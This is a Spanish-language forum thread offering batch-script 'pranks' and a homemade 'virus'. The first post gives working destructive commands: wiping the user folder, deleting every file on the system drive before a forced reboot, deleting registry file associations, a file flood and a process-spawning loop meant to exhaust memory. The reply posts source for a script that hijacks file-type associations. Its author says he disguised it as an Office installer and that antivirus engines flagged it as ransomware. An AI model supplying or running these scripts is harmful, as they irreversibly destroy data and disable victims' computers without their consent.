Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[BATCH] Pranks

  • 1 Respuestas
  • 2973 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Conectado 79137913

« en: Junio 04, 2018, 11:53:44 am »
HOLA!!!

Les dejo una lista de Pranks (bromas pesadas) en BATCH:

1 Deshabilitar Mouse:
Código: DOS
  1. set key="HKEYLOCALMACHINE\system\CurrentControlSet\Services\Mouclass"
  2. reg delete %key%
  3. reg add %key% /v Start /t REG_DWORD /d 4_

2 Invertir Mouse:
Código: Bash
  1. Rundll32 user32,SwapMouseButton

3 Eliminar toda la carpeta del usuario que corre el script: [PELIGROSO, SIN ARREGLO]
Código: DOS
  1. del /f /q "C:\Users\%userprofile%\*.*"

4 Cambiar hora de la pc:
Código: DOS
  1. time 00:00

5 File Flood:
Código: DOS
  1. :start
  2. echo Hola >>%random%.txt
  3. goto start

6 Romper PC: [PELIGROSO, SIN ARREGLO]
Código: DOS
  1. del %systemdrive%\*.* /f /s /q
  2. shutdown -r -f -t 00

7 Error sos muy tonto, el sitstema se reiniciara para ver si no estas cuando vuelva:
Código: DOS
  1. msg * Error Fatal debido a la idiotez del usuario actual!
  2. shutdown -c “Error! sos muy tonto, el sitstema se apagará para ver si no estás cuando vuelva!” -s -t 10

8 Destruir registro: [PELIGROSO, SIN ARREGLO]
Código: DOS
  1. START reg delete HKCR/.exe
  2. START reg delete HKCR/.dll
  3. START reg delete HKCR/*
  4. :MSGX
  5. ECHO Tu pc ha sido destruida, que tengas un gran dia!
  6. GOTO MSGX

9 Ram Overflow con notepads:
Código: DOS
  1. :nuevo
  2. START %SystemRoot%\system32\notepad.exe
  3. GOTO nuevo

GRACIAS POR LEER!!!
« Última modificación: Junio 05, 2018, 09:06:04 pm por Gabriela »
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scout Team*                                                   DOORS.PARTY

Desconectado Aincrad

  • *
  • Underc0der
  • Mensajes: 22
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Email
« Respuesta #1 en: Junio 05, 2018, 08:27:59 pm »
UMM INTERESANTE. YO Hice un virus simple que confunde los formatos por medio del registro. la cual causaba q no pudieras correr ningún formato .msi .exe .mp4 . no corría nada ni siquiera el administrador de tareas , ni siquiera el antivirus. bueno probé varios y el único que lo detectaba es el 360 total security realmente es el mejor antivirus q he probado aparte de DR,Web antivirus.

eliminen ese avast , avg , o panda son antivirus Basura.

Para Windows les recomiendo :

360 total security

Para android el mejor antivirus que he encontrado es (puede eliminar esos 50 virus de mi android , he incleso ese maldi** virus llamado Netalpha):

DR,Web antivirus



Bueno me desvíe del tema al que me refería :V . Bueno el virus del que hablaba es este:

Source code (ATENCION :  este virus puede llegar a ser peligroso , si le ponen una linea debilitando el registro y otra linea confundiendo los formatos .bat y otros formatos de ejecución puede a llegar a ser peligroso. (sin reparacion) ):

Código: DOS
  1. @echo off
  2. reg add HKCU\Software\Classes\.VBS /d "htafile" /f
  3. reg add HKCU\Software\Classes\.docx /d "htafile" /f
  4. reg add HKCU\Software\Classes\.pdf /d "htafile" /f
  5. reg add HKCU\Software\Classes\.doc /d "htafile" /f
  6. reg add HKCU\Software\Classes\.mp3 /d "htafile" /f
  7. reg add HKCU\Software\Classes\.mp4 /d "htafile" /f
  8. reg add HKCU\Software\Classes\.EXE /d "htafile" /f

Bueno el virus lo copile y lo disfrace  de Microsoft Ofice 2007 Installer y lo que paso fue que al subirlo al virustotal o a Hibrid Analizis me lo detectaron como RAMSOMWARE Pueden creerlo un simple scrip Batch detectado como ramsomware. "REALMENTE ME CAGUE DE LA RISA  ;D "

Para que vean que no miento (la primera vez que lo subí solo lo detectaban unos 4 de 64 ) :

Analisis de mi virus en virustotal la mayoria lo detecto como "RDN/Ransom" / "Trojan-Ransom.MSIL.Agent.aap"



Algunas imágenes después de abrir el virus :

Intentando abrir el navegador : (Ojo todos los formatos que confundas se abrirán así )







Bueno ahora Viene la solución a esta virus osea el Parche . (No crean que me voy a auto-joder con mi propia creación)

Código: DOS
  1. parche removido

Bueno cuando abran el Parche les pedirá una contraseña que es : 2111995 , Como ven el Ofusque el codigo fuente del Parche con la herramienta BatchCrypt , Perdon por no proporcionar el codigo desofuscado pero lo perdi y me da flojera ponerme a desofuscarlo . :v  :P

« Última modificación: Abril 20, 2019, 10:33:44 am por Aincrad »

 

¿Te gustó el post? COMPARTILO!



""MSN"" en batch

Iniciado por Elle Lawliet

Respuestas: 6
Vistas: 4306
Último mensaje Julio 18, 2011, 01:35:47 am
por JaAViEr
[Código-Batch] Usuarios del PC & Procesos Ejecución - WMIC - JaAViEr

Iniciado por JaAViEr

Respuestas: 0
Vistas: 2150
Último mensaje Julio 17, 2011, 05:21:18 am
por JaAViEr
Detecta Autorun.Inf + Eliminación de Archivo Infectado - JaAViEr - Batch

Iniciado por JaAViEr

Respuestas: 4
Vistas: 3729
Último mensaje Julio 18, 2011, 06:36:47 pm
por LucaSthefano
[Código-Batch] Consola de Comandos Versión Arcoiris - JaAViEr

Iniciado por JaAViEr

Respuestas: 0
Vistas: 2491
Último mensaje Julio 17, 2011, 05:29:39 am
por JaAViEr
[Código-Batch] Saber si un número es entero - JaAViEr

Iniciado por JaAViEr

Respuestas: 0
Vistas: 1988
Último mensaje Julio 17, 2011, 05:19:17 am
por JaAViEr